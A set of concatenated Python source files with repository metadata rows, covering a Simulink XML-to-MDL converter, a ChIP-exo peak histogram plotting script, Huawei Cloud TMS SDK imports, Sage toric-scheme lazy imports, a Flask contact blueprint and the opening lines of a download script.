self.name_attr = x
if x.name == 'Class':
self.class_attr = x
@classmethod
def from_XmlElement(cls, xml_element):
return P(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
quoted = f'{self.name_attr.value} "{self.content}"' # default
unquoted = f'{self.name_attr.value} {self.content}'
boxed = f'{self.name_attr.value} [{self.content}]'
unquoted_indented = f' {self.name_attr.value} {self.content}'
# order rules by priority.
if '"' in self.content: # content contains double quotes i.e. "
return quoted
# OBSERVATION: if these are not indented, model comparison shows differences -- don't know why
# TODO: If mdl-preetification is implemented, this can be removed as preetifying mdl will
# introduce indentation by itself
if self.name_attr and self.name_attr.value in [
'rep_seq_t', # see applications/sldemo_hydroid
'rep_seq_y', # see applications/sldemo_hydroid
]:
return unquoted_indented
if self.name_attr and self.name_attr.value in [
'Components', # mandatory
'Location', # mandatory
'Position',
]:
return unquoted
# contents starting and ending with [ and ] respectively are MOSTLY unquoted,
# However, if some p tags with content starting and ending in [ and ] respectively need to
# be quoted, put them in the list inside this rule.
if self.content.startswith('[') and self.content.endswith(']'):
# special
if self.name_attr and self.name_attr.value in [
]:
return quoted
# default
return unquoted
if self.content in ['on', 'off']:
return unquoted
if self.class_attr:
if self.class_attr.value == 'double':
if self.content.startswith('[') and self.content.endswith(']'):
return unquoted
return boxed
if self.class_attr.value in ['logical', 'int32', 'uint32']:
return boxed
return quoted
class Port(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Port') and strval.endswith('</Port>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.arrays = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Array':
self.arrays.append(Array.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Port' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Port(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Port {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.arrays:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Prompt(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Prompt') and strval.endswith('</Prompt>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Prompt(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Prompt "{self.content}"'
class Range(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Range') and strval.endswith('</Range>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Range(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Range {self.content}'
class RequireFunction(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<RequireFunction') and strval.endswith('</RequireFunction>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'RequireFunction' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return RequireFunction(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'RequireFunction {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class SimulationSettings(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<SimulationSettings') and strval.endswith('</SimulationSettings>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.objects = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for x in self.inner_xmls:
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'SimulationSettings' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return SimulationSettings(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class SLCCPluginPlugin(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<SLCCPlugin') and strval.endswith('</SLCCPlugin>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'SLCCPlugin' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return SLCCPluginPlugin(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class SubsystemReference(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<SubsystemReference') and strval.endswith('</SubsystemReference>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'SubsystemReference' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return SubsystemReference(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'SubsystemReference {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class System(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<System') and strval.endswith('</System>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.blocks = []
self.lines = []
self.annotations = []
self.lists = []
self.functionConnectors = []
self.connectors = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Block':
self.blocks.append(Block.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Line':
self.lines.append(Line.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Annotation':
self.annotations.append(Annotation.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'List':
self.lists.append(List.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'FunctionConnector':
self.functionConnectors.append(FunctionConnector.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Connector':
self.connectors.append(Connector.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'System' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return System(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'System {\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.blocks:
str_ += f'{x.strmdl}\n'
for x in self.lines:
str_ += f'{x.strmdl}\n'
for x in self.annotations:
str_ += f'{x.strmdl}\n'
for x in self.lists:
str_ += f'{x.strmdl}\n'
for x in self.functionConnectors:
str_ += f'{x.strmdl}\n'
for x in self.connectors:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class SystemDefaults(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<SystemDefaults') and strval.endswith('</SystemDefaults>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'SystemDefaults' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return SystemDefaults(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'System {\n' # SystemDefaults appears as System only
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class TabName(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<TabName') and strval.endswith('</TabName>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return TabName(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'TabName "{self.content}"'
class TestPointedSignal(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<TestPointedSignal') and strval.endswith('</TestPointedSignal>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'TestPointedSignal' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return TestPointedSignal(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'TestPointedSignal {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Tooltip(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Tooltip') and strval.endswith('</Tooltip>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Tooltip(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Tooltip "{self.content}"'
class Type(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Type') and strval.endswith('</Type>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Type(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Type "{self.content}"'
class UserParameters(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<UserParameters') and strval.endswith('</UserParameters>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'UserParameters' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return UserParameters(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class TypeOptions(XmlElement):
# first found in design-model-behavior/prioritydemo
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<TypeOptions') and strval.endswith('</TypeOptions>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.options = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Option':
self.options.append(Option.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'TypeOptions' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return TypeOptions(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Array {\n' # special
str_ += 'Type "Cell"\n'
str_ += f'Dimension {len(self.inner_xmls_of_type_xml)}\n'
str_ += 'PropName "TypeOptions"\n' # required
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.options:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Value(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Value') and strval.endswith('</Value>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Value(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Value "{self.content}"'
class Verification(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Verification') and strval.endswith('</Verification>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Verification' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Verification(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
# special: this tag was found in matlab-central/Baro_Library
# but the content was not found in corresponding mdl format
return ''
# str_ = 'Verification {\n'
# for x in self.attrs:
# str_ += f'{x.name} "{x.value}"\n'
# for x in self.ps:
# str_ += f'{x.strmdl}\n'
# str_ += '}\n\n'
# return str_
class WebScopes_FoundationPlugin(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<WebScopes_FoundationPlugin') and strval.endswith('</WebScopes_FoundationPlugin>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'WebScopes_FoundationPlugin' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return WebScopes_FoundationPlugin(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class WindowsInfo(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<WindowsInfo') and strval.endswith('</WindowsInfo>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.objects = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'WindowsInfo' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return WindowsInfo(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = ''
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
if __name__ == '__main__':
pass
| 31.923316 | 218 | 0.568478 | 13,665 | 112,817 | 4.521332 | 0.035785 | 0.033989 | 0.033892 | 0.056487 | 0.742668 | 0.736081 | 0.726078 | 0.722452 | 0.712223 | 0.693448 | 0 | 0.000477 | 0.31177 | 112,817 | 3,533 | 219 | 31.932352 | 0.795258 | 0.062996 | 0 | 0.730693 | 0 | 0 | 0.131662 | 0.018797 | 0 | 0 | 0 | 0.000849 | 0.029703 | 1 | 0.089505 | false | 0.000396 | 0.000396 | 0.035248 | 0.184951 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aed6f04bfb46307a63ec9a2d1788a8a918a2ffb0 | 4,146 | py | Python | SupplementaryInformation/CreateHistogramPlots.py | SysBioChalmers/ChIPexo_Pipeline | 7fa9dcfcb443bbe7b55f36051e7e86b5b38741a4 | [
"MIT"
] | null | null | null | SupplementaryInformation/CreateHistogramPlots.py | SysBioChalmers/ChIPexo_Pipeline | 7fa9dcfcb443bbe7b55f36051e7e86b5b38741a4 | [
"MIT"
] | 1 | 2020-06-01T08:14:19.000Z | 2020-08-05T15:26:49.000Z | SupplementaryInformation/CreateHistogramPlots.py | SysBioChalmers/ChIPexo_Pipeline | 7fa9dcfcb443bbe7b55f36051e7e86b5b38741a4 | [
"MIT"
] | 2 | 2019-09-12T05:43:20.000Z | 2020-02-29T06:14:59.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Python SubFunction for creating the HeatMap Data
Part of the Supplementary Information
@author: Christoph S. Boerlin; Chalmers University of Technology, Gothenburg Sweden
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
selectedTFandConds={'Ino2':'Glu','Stb5':'Nit','Gcn4':'Glu','Cbf1':'Ana'}
path='C:/Users/borlinc/Documents/Projects/190219_ChipExoPipeline/SupplementaryInformation/'
pathToGEM=path+'GEM_Files/'
pathToTF=path+'ReadData/'
for TF,cond in selectedTFandConds.items():
#load histogram data
histogramData=pd.read_csv(path+TF+'_'+cond+'_PeakHistogramData.csv',sep='\t',index_col=0)
#sort peaks after read count
sortIndex=histogramData.loc[:,[str(x)+'_plus' for x in range(-50,51)]+[str(x)+'_minus' for x in range(-50,51)]].sum(axis=1).sort_values(0,ascending=False).index
histogramData=histogramData.reindex(sortIndex,axis='index')
#extract strandProfiles
strandProfile={}
strandProfile['plus']=histogramData.loc[:,[str(x)+'_plus' for x in range(-50,51)]]
strandProfile['minus']=histogramData.loc[:,[str(x)+'_minus' for x in range(-50,51)]]
#create plot data for plus strand / blue color
blueData=np.zeros([strandProfile['plus'].shape[0],strandProfile['plus'].shape[1],4])
blueData[:,:,2]=np.ones(blueData[:,:,2].shape)
blueData[:,:,3]=strandProfile['plus']/(np.max(strandProfile['plus'].values)*0.10)
#everything above 0.75 is clipped to 0.75
blueData[blueData[:,:,3]>0.75,3]=0.75
#create plot data for minus strand / red color
redData=np.zeros([strandProfile['minus'].shape[0],strandProfile['minus'].shape[1],4])
redData[:,:,0]=np.ones(redData[:,:,2].shape)
redData[:,:,3]=strandProfile['minus']/(np.max(strandProfile['minus'].values)*0.10)
#everything above 0.75 is clipped to 0.75
redData[redData[:,:,3]>0.75,3]=0.75
#plot histogram
fig, ax = plt.subplots(figsize=(10, 12))
plt.xticks([0,24,50,75,100],[-50,-25,0,25,50])
plt.xlabel('Distance from Peak [bp]',fontsize=16)
plt.yticks([],[])
plt.title('Read distribution around '+str(len(histogramData))+' peaks for '+TF+' in '+cond,fontsize=16)
ax.imshow(blueData,interpolation=None,aspect='auto')
ax.imshow(redData,interpolation=None,aspect='auto')
fig.savefig(path+TF+'_'+cond+'_PeakHistogram_ReadCountSorted.png',dpi=300,bbox_inches="tight")
#sort peaks after peakStrength
sortIndex=histogramData.loc[:,'Peak Strength'].sort_values(0,ascending=False).index
histogramData=histogramData.reindex(sortIndex,axis='index')
#extract strandProfiles
strandProfile={}
strandProfile['plus']=histogramData.loc[:,[str(x)+'_plus' for x in range(-50,51)]]
strandProfile['minus']=histogramData.loc[:,[str(x)+'_minus' for x in range(-50,51)]]
#create plot data for plus strand / blue color
blueData=np.zeros([strandProfile['plus'].shape[0],strandProfile['plus'].shape[1],4])
blueData[:,:,2]=np.ones(blueData[:,:,2].shape)
blueData[:,:,3]=strandProfile['plus']/(np.max(strandProfile['plus'].values)*0.10)
#everything above 0.75 is clipped to 0.75
blueData[blueData[:,:,3]>0.75,3]=0.75
#create plot data for minus strand / red color
redData=np.zeros([strandProfile['minus'].shape[0],strandProfile['minus'].shape[1],4])
redData[:,:,0]=np.ones(redData[:,:,2].shape)
redData[:,:,3]=strandProfile['minus']/(np.max(strandProfile['minus'].values)*0.10)
#everything above 0.75 is clipped to 0.75
redData[redData[:,:,3]>0.75,3]=0.75
#plot histogram
fig, ax = plt.subplots(figsize=(10, 12))
plt.xticks([0,24,50,75,100],[-50,-25,0,25,50])
plt.xlabel('Distance from Peak [bp]',fontsize=16)
plt.yticks([],[])
plt.title('Read distribution around '+str(len(histogramData))+' peaks for '+TF+' in '+cond,fontsize=16)
ax.imshow(blueData,interpolation=None,aspect='auto')
ax.imshow(redData,interpolation=None,aspect='auto')
fig.savefig(path+TF+'_'+cond+'_PeakHistogram_PeakStrengthSorted.png',dpi=300,bbox_inches="tight")
| 45.065217 | 165 | 0.676797 | 576 | 4,146 | 4.833333 | 0.269097 | 0.017241 | 0.011494 | 0.023707 | 0.768319 | 0.768319 | 0.751078 | 0.751078 | 0.751078 | 0.742457 | 0 | 0.053144 | 0.13314 | 4,146 | 91 | 166 | 45.56044 | 0.72148 | 0.170285 | 0 | 0.745098 | 0 | 0 | 0.154274 | 0.051815 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aef7f76b11f31feacdaaefd95c6cc7debdd3a93f | 1,860 | py | Python | huaweicloud-sdk-tms/huaweicloudsdktms/v1/__init__.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | 64 | 2020-06-12T07:05:07.000Z | 2022-03-30T03:32:50.000Z | huaweicloud-sdk-tms/huaweicloudsdktms/v1/__init__.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | 11 | 2020-07-06T07:56:54.000Z | 2022-01-11T11:14:40.000Z | huaweicloud-sdk-tms/huaweicloudsdktms/v1/__init__.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | 24 | 2020-06-08T11:42:13.000Z | 2022-03-04T06:44:08.000Z | # coding: utf-8
from __future__ import absolute_import
# import TmsClient
from huaweicloudsdktms.v1.tms_client import TmsClient
from huaweicloudsdktms.v1.tms_async_client import TmsAsyncClient
# import models into sdk package
from huaweicloudsdktms.v1.model.create_predefine_tags_request import CreatePredefineTagsRequest
from huaweicloudsdktms.v1.model.create_predefine_tags_response import CreatePredefineTagsResponse
from huaweicloudsdktms.v1.model.delete_predefine_tags_request import DeletePredefineTagsRequest
from huaweicloudsdktms.v1.model.delete_predefine_tags_response import DeletePredefineTagsResponse
from huaweicloudsdktms.v1.model.link import Link
from huaweicloudsdktms.v1.model.list_api_versions_request import ListApiVersionsRequest
from huaweicloudsdktms.v1.model.list_api_versions_response import ListApiVersionsResponse
from huaweicloudsdktms.v1.model.list_predefine_tags_request import ListPredefineTagsRequest
from huaweicloudsdktms.v1.model.list_predefine_tags_response import ListPredefineTagsResponse
from huaweicloudsdktms.v1.model.modify_prefine_tag import ModifyPrefineTag
from huaweicloudsdktms.v1.model.predefine_tag import PredefineTag
from huaweicloudsdktms.v1.model.predefine_tag_request import PredefineTagRequest
from huaweicloudsdktms.v1.model.req_create_predefine_tag import ReqCreatePredefineTag
from huaweicloudsdktms.v1.model.req_delete_predefine_tag import ReqDeletePredefineTag
from huaweicloudsdktms.v1.model.show_api_version_request import ShowApiVersionRequest
from huaweicloudsdktms.v1.model.show_api_version_response import ShowApiVersionResponse
from huaweicloudsdktms.v1.model.update_predefine_tags_request import UpdatePredefineTagsRequest
from huaweicloudsdktms.v1.model.update_predefine_tags_response import UpdatePredefineTagsResponse
from huaweicloudsdktms.v1.model.version_detail import VersionDetail
| 64.137931 | 97 | 0.90914 | 211 | 1,860 | 7.748815 | 0.260664 | 0.269725 | 0.295413 | 0.325382 | 0.468502 | 0.430581 | 0.331498 | 0 | 0 | 0 | 0 | 0.012521 | 0.055376 | 1,860 | 28 | 98 | 66.428571 | 0.918042 | 0.032796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9d7c83954a704c7db9ca451ab8a2c5bcc94b0436 | 379 | py | Python | src/sage/schemes/toric/all.py | UCD4IDS/sage | 43474c96d533fd396fe29fe0782d44dc7f5164f7 | [
"BSL-1.0"
] | 1,742 | 2015-01-04T07:06:13.000Z | 2022-03-30T11:32:52.000Z | src/sage/schemes/toric/all.py | UCD4IDS/sage | 43474c96d533fd396fe29fe0782d44dc7f5164f7 | [
"BSL-1.0"
] | 66 | 2015-03-19T19:17:24.000Z | 2022-03-16T11:59:30.000Z | src/sage/schemes/toric/all.py | UCD4IDS/sage | 43474c96d533fd396fe29fe0782d44dc7f5164f7 | [
"BSL-1.0"
] | 495 | 2015-01-10T10:23:18.000Z | 2022-03-24T22:06:11.000Z | from sage.misc.lazy_import import lazy_import
lazy_import('sage.schemes.toric.weierstrass', 'WeierstrassForm')
lazy_import('sage.schemes.toric.variety', ['AffineToricVariety', 'ToricVariety'])
lazy_import('sage.schemes.toric.library', 'toric_varieties')
lazy_import('sage.schemes.toric.fano_variety', 'CPRFanoToricVariety')
lazy_import('sage.schemes.toric.ideal', 'ToricIdeal')
| 47.375 | 81 | 0.807388 | 46 | 379 | 6.456522 | 0.391304 | 0.23569 | 0.23569 | 0.353535 | 0.43771 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042216 | 379 | 7 | 82 | 54.142857 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0.596306 | 0.361478 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
9d97eec2d67d98dcae5e01933faaa1ac2538bd1b | 193 | py | Python | views/contact.py | vinztheprinze99/ADE-Scheduler | dee1e1f7e55e637452f8f32175da454a954e13cd | [
"MIT"
] | 16 | 2019-09-20T15:33:46.000Z | 2021-09-14T22:34:39.000Z | views/contact.py | vinztheprinze99/ADE-Scheduler | dee1e1f7e55e637452f8f32175da454a954e13cd | [
"MIT"
] | 271 | 2020-09-15T10:18:19.000Z | 2021-11-08T20:40:03.000Z | views/contact.py | vinztheprinze99/ADE-Scheduler | dee1e1f7e55e637452f8f32175da454a954e13cd | [
"MIT"
] | 7 | 2020-05-05T12:44:32.000Z | 2021-09-11T08:22:42.000Z | from flask import Blueprint, render_template
contact = Blueprint("contact", __name__, static_folder="../static")
@contact.route("/")
def index():
return render_template("contact.html")
| 19.3 | 67 | 0.73057 | 22 | 193 | 6.090909 | 0.681818 | 0.208955 | 0.313433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119171 | 193 | 9 | 68 | 21.444444 | 0.788235 | 0 | 0 | 0 | 0 | 0 | 0.150259 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0.4 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
9dd7ef463e99a5887250a9f6360037005cf1e4a2 | 174 | py | Python | data/county_level/raw/nchs_mortality/download.py | csinva/covid-19-analysis | e7b1e82cb6b25d62a868ff61025d88e17452de28 | [
"MIT"
] | 2 | 2020-03-24T16:50:02.000Z | 2020-03-24T17:00:50.000Z | data_new/county_level/raw/nchs_mortality/download.py | rahul263-stack/covid19-severity-prediction | f581adb2fccb12d5ab3f3c59ee120f484703edf5 | [
"MIT"
] | 1 | 2020-03-28T15:34:28.000Z | 2020-03-28T19:22:27.000Z | data/county_level/raw/nchs_mortality/download.py | Yu-Group/covid-19-ventilator-demand-prediction | e7b1e82cb6b25d62a868ff61025d88e17452de28 | [
"MIT"
] | null | null | null | #! /usr/bin/python3
import os
